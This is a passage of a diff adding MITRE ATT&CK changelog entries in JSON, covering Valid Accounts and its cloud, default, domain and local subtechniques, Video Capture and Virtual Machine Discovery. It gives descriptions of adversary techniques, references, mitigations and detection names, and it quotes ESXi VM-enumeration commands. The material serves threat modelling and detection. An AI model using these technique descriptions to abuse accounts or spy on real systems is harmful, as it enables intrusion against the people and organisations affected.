+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0066: User Execution \u2013 Malicious Link (click \u2192 suspicious egress \u2192 download/write \u2192 follow-on activity)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:31:00.645000+00:00",
+                    "modified": "2026-05-12 15:12:00.707000+00:00",
+                    "name": "Valid Accounts",
+                    "description": "Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.\n\nIn some cases, adversaries may abuse inactive accounts: for example, those belonging to individuals who are no longer part of an organization. Using these accounts may allow the adversary to evade detection, as the original account user will not be present to identify any anomalous activity taking place on their account.(Citation: CISA MFA PrintNightmare)\n\nThe overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.(Citation: TechNet Credential Theft)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "initial-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1078",
+                            "external_id": "T1078"
+                        },
+                        {
+                            "source_name": "volexity_0day_sophos_FW",
+                            "description": "Adair, S., Lancaster, T., Volexity Threat Research. (2022, June 15). DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach. Retrieved July 1, 2022.",
+                            "url": "https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/"
+                        },
+                        {
+                            "source_name": "CISA MFA PrintNightmare",
+                            "description": "Cybersecurity and Infrastructure Security Agency. (2022, March 15). Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and \u201cPrintNightmare\u201d Vulnerability. Retrieved March 16, 2022.",
+                            "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-074a"
+                        },
+                        {
+                            "source_name": "TechNet Credential Theft",
+                            "description": "Microsoft. (2016, April 15). Attractive Accounts for Credential Theft. Retrieved June 3, 2016.",
+                            "url": "https://technet.microsoft.com/en-us/library/dn535501.aspx"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Jon Sternstein, Stern Security",
+                        "Mark Wee",
+                        "Menachem Goldstein",
+                        "Netskope",
+                        "Praetorian",
+                        "Prasad Somasamudram, McAfee",
+                        "Sekhar Sarukkai, McAfee",
+                        "Syed Ummar Farooqh, McAfee",
+                        "Yossi Weizman, Azure Defender Research Team"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Containers",
+                        "ESXi",
+                        "IaaS",
+                        "Identity Provider",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Office Suite",
+                        "SaaS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.707000+00:00\", \"old_value\": \"2026-04-15 22:49:37.148000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1013: Application Developer Guidance",
+                            "M1015: Active Directory Configuration",
+                            "M1017: User Training",
+                            "M1018: User Account Management",
+                            "M1026: Privileged Account Management",
+                            "M1027: Password Policies",
+                            "M1032: Multi-factor Authentication",
+                            "M1036: Account Use Policies"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0560: Detection of Valid Account Abuse Across Platforms"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-13 20:36:57.378000+00:00",
+                    "modified": "2026-05-12 15:12:00.723000+00:00",
+                    "name": "Cloud Accounts",
+                    "description": "Valid accounts in cloud environments may allow adversaries to perform actions to achieve Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. Cloud Accounts can exist solely in the cloud; alternatively, they may be hybrid-joined between on-premises systems and the cloud through syncing or federation with other identity sources such as Windows Active Directory.(Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)\n\nService or user accounts may be targeted by adversaries through [Brute Force](https://attack.mitre.org/techniques/T1110), [Phishing](https://attack.mitre.org/techniques/T1566), or various other means to gain access to the environment. Federated or synced accounts may be a pathway for the adversary to affect both on-premises systems and cloud environments - for example, by leveraging shared credentials to log onto [Remote Services](https://attack.mitre.org/techniques/T1021). High privileged cloud accounts, whether federated, synced, or cloud-only, may also allow pivoting to on-premises environments by leveraging SaaS-based [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) to run commands on hybrid-joined devices.\n\nAn adversary may create long lasting [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) on a compromised cloud account to maintain persistence in the environment. Such credentials may also be used to bypass security controls such as multi-factor authentication. \n\nCloud accounts may also be able to assume [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005) or other privileges through various means within the environment. Misconfigurations in role assignments or role assumption policies may allow an adversary to use these mechanisms to leverage permissions outside the intended scope of the account. Such over privileged accounts may be used to harvest sensitive data from online storage accounts and databases through [Cloud API](https://attack.mitre.org/techniques/T1059/009) or other methods. For example, in Azure environments, adversaries may target Azure Managed Identities, which allow associated Azure resources to request access tokens. By compromising a resource with an attached Managed Identity, such as an Azure VM, adversaries may be able to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s to move laterally across the cloud environment.(Citation: SpecterOps Managed Identity 2022)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "initial-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1078/004",
+                            "external_id": "T1078.004"
+                        },
+                        {
+                            "source_name": "AWS Identity Federation",
+                            "description": "Amazon. (n.d.). Identity Federation in AWS. Retrieved March 13, 2020.",
+                            "url": "https://aws.amazon.com/identity/federation/"
+                        },
+                        {
+                            "source_name": "SpecterOps Managed Identity 2022",
+                            "description": "Andy Robbins. (2022, June 6). Managed Identity Attack Paths, Part 1: Automation Accounts. Retrieved March 18, 2025.",
+                            "url": "https://posts.specterops.io/managed-identity-attack-paths-part-1-automation-accounts-82667d17187a?gi=6a9daedade1c"
+                        },
+                        {
+                            "source_name": "Google Federating GC",
+                            "description": "Google. (n.d.). Federating Google Cloud with Active Directory. Retrieved March 13, 2020.",
+                            "url": "https://cloud.google.com/solutions/federating-gcp-with-active-directory-introduction"
+                        },
+                        {
+                            "source_name": "Microsoft Deploying AD Federation",
+                            "description": "Microsoft. (n.d.). Deploying Active Directory Federation Services in Azure. Retrieved March 13, 2020.",
+                            "url": "https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Alon Klayman, Hunters Security",
+                        "Arun Seelagan, CISA",
+                        "Eliraz Levi, Hunters Security",
+                        "Jon Sternstein, Stern Security"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "IaaS",
+                        "Identity Provider",
+                        "Office Suite",
+                        "SaaS"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.723000+00:00\", \"old_value\": \"2026-04-15 22:51:18.773000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1015: Active Directory Configuration",
+                            "M1017: User Training",
+                            "M1018: User Account Management",
+                            "M1026: Privileged Account Management",
+                            "M1027: Password Policies",
+                            "M1032: Multi-factor Authentication",
+                            "M1036: Account Use Policies"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0546: Detection of Abused or Compromised Cloud Accounts for Access and Persistence"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-13 20:15:31.974000+00:00",
+                    "modified": "2026-05-12 15:12:00.636000+00:00",
+                    "name": "Default Accounts",
+                    "description": "Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS, the root user account in ESXi, and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)\n\nDefault accounts are not limited to client machines; rather, they also include accounts that are preset for equipment such as network devices and computer applications, whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module)\n\nDefault accounts may be created on a system after initial setup by connecting or integrating it with another application. For example, when an ESXi server is connected to a vCenter server, a default privileged account called `vpxuser` is created on the ESXi server. If a threat actor is able to compromise this account\u2019s credentials (for example, via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212) on the vCenter host), they will then have access to the ESXi server.(Citation: Google Cloud Threat Intelligence VMWare ESXi Zero-Day 2023)(Citation: Pentera vCenter Information Disclosure)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "initial-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1078/001",
+                            "external_id": "T1078.001"
+                        },
+                        {
+                            "source_name": "Google Cloud Threat Intelligence VMWare ESXi Zero-Day 2023",
+                            "description": "Alexander Marvi, Brad Slaybaugh, Ron Craft, and Rufus Brown. (2023, June 13). VMware ESXi Zero-Day Used by Chinese Espionage Actor to Perform Privileged Guest Operations on Compromised Hypervisors. Retrieved March 26, 2025.",
+                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/vmware-esxi-zero-day-bypass/"
+                        },
+                        {
+                            "source_name": "AWS Root User",
+                            "description": "Amazon. (n.d.). AWS Account Root User. Retrieved April 5, 2021.",
+                            "url": "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html"
+                        },
+                        {
+                            "source_name": "Microsoft Local Accounts Feb 2019",
+                            "description": "Microsoft. (2018, December 9). Local Accounts. Retrieved February 11, 2019.",
+                            "url": "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts"
+                        },
+                        {
+                            "source_name": "Metasploit SSH Module",
+                            "description": "undefined. (n.d.). Retrieved April 12, 2019.",
+                            "url": "https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/linux/ssh"
+                        },
+                        {
+                            "source_name": "Threat Matrix for Kubernetes",
+                            "description": "Weizman, Y. (2020, April 2). Threat Matrix for Kubernetes. Retrieved March 30, 2021.",
+                            "url": "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/"
+                        },
+                        {
+                            "source_name": "Pentera vCenter Information Disclosure",
+                            "description": "Yuval Lazar. (2022, March 29). Mitigating VMware vCenter Information Disclosure. Retrieved March 26, 2025.",
+                            "url": "https://pentera.io/blog/information-disclosure-in-vmware-vcenter/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Janantha Marasinghe"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Containers",
+                        "ESXi",
+                        "IaaS",
+                        "Identity Provider",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Office Suite",
+                        "SaaS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.636000+00:00\", \"old_value\": \"2026-04-15 22:50:51.753000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1027: Password Policies",
+                            "M1032: Multi-factor Authentication"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0465: Detection of Default Account Abuse Across Platforms"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-13 20:21:54.758000+00:00",
+                    "modified": "2026-05-12 15:12:00.714000+00:00",
+                    "name": "Domain Accounts",
+                    "description": "Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.(Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)\n\nAdversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "initial-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1078/002",
+                            "external_id": "T1078.002"
+                        },
+                        {
+                            "source_name": "TechNet Credential Theft",
+                            "description": "Microsoft. (2016, April 15). Attractive Accounts for Credential Theft. Retrieved June 3, 2016.",
+                            "url": "https://technet.microsoft.com/en-us/library/dn535501.aspx"
+                        },
+                        {
+                            "source_name": "Microsoft AD Accounts",
+                            "description": "Microsoft. (2019, August 23). Active Directory Accounts. Retrieved March 13, 2020.",
+                            "url": "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-accounts"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Jon Sternstein, Stern Security"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.714000+00:00\", \"old_value\": \"2026-04-15 22:50:57.880000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1017: User Training",
+                            "M1018: User Account Management",
+                            "M1026: Privileged Account Management",
+                            "M1027: Password Policies",
+                            "M1032: Multi-factor Authentication"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0210: Abuse of Domain Accounts"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-13 20:26:46.695000+00:00",
+                    "modified": "2026-05-12 15:12:00.726000+00:00",
+                    "name": "Local Accounts",
+                    "description": "Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.\n\nLocal Accounts may also be abused to elevate privileges and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "initial-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1078/003",
+                            "external_id": "T1078.003"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Containers",
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.726000+00:00\", \"old_value\": \"2026-04-15 22:51:08.702000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1026: Privileged Account Management",
+                            "M1027: Password Policies",
+                            "M1032: Multi-factor Authentication"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0407: Detection of Local Account Abuse for Initial Access and Persistence"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:31:37.917000+00:00",
+                    "modified": "2026-05-12 15:12:00.641000+00:00",
+                    "name": "Video Capture",
+                    "description": "An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.\n\nMalware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices or applications for video recording rather than capturing the victim's screen.\n\nIn macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. (Citation: objective-see 2017 review)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "collection"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1125",
+                            "external_id": "T1125"
+                        },
+                        {
+                            "source_name": "objective-see 2017 review",
+                            "description": "Patrick Wardle. (n.d.). Retrieved March 20, 2018.",
+                            "url": "https://objective-see.com/blog/blog_0x25.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Praetorian"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.641000+00:00\", \"old_value\": \"2025-10-24 17:48:56.077000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0197: Behavior-chain, platform-aware detection strategy for T1125 Video Capture"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--6bc7f9aa-b91f-4b23-84b8-5e756eba68eb",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-03-27 15:32:17.400000+00:00",
+                    "modified": "2026-05-12 15:12:00.640000+00:00",
+                    "name": "Virtual Machine Discovery",
+                    "description": "An adversary may attempt to enumerate running virtual machines (VMs) after gaining access to a host or hypervisor. For example, adversaries may enumerate a list of VMs on an ESXi hypervisor using a [Hypervisor CLI](https://attack.mitre.org/techniques/T1059/012) such as `esxcli` or `vim-cmd` (e.g. `esxcli vm process list or vim-cmd vmsvc/getallvms`).(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)(Citation: TrendMicro Play) Adversaries may also directly leverage a graphical user interface, such as VMware vCenter, in order to view virtual machines on a host. \n\nAdversaries may use the information from [Virtual Machine Discovery](https://attack.mitre.org/techniques/T1673) during discovery to shape follow-on behaviors. Subsequently discovered VMs may be leveraged for follow-on activities such as [Service Stop](https://attack.mitre.org/techniques/T1489) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1673",
+                            "external_id": "T1673"
+                        },
+                        {
+                            "source_name": "TrendMicro Play",
+                            "description": "Cj Arsley Mateo, Darrel Tristan Virtusio, Sarah Pearl Camiling, Andrei Alimboyao, Nathaniel Morales, Jacob Santos, Earl John Bareng. (2024, July 19). Play Ransomware Group\u2019s New Linux Variant Targets ESXi, Shows Ties With Prolific Puma. Retrieved March 26, 2025.",
+                            "url": "https://www.trendmicro.com/en_us/research/24/g/new-play-ransomware-linux-variant-targets-esxi-shows-ties-with-p.html"
+                        },
+                        {
+                            "source_name": "Crowdstrike Hypervisor Jackpotting Pt 2 2021",
+                            "description": "Michael Dawson. (2021, August 30). Hypervisor Jackpotting, Part 2: eCrime Actors Increase Targeting of ESXi Servers with Ransomware. Retrieved March 26, 2025.",
+                            "url": "https://www.crowdstrike.com/en-us/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Janantha Marasinghe"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.640000+00:00\", \"old_value\": \"2025-04-15 21:24:32.155000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0199: Detection Strategy for Virtual Machine Discovery"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-04-17 22:22:24.505000+00:00",
+                    "modified": "2026-05-12 15:12:00.672000+00:00",
+                    "name": "Virtualization/Sandbox Evasion",
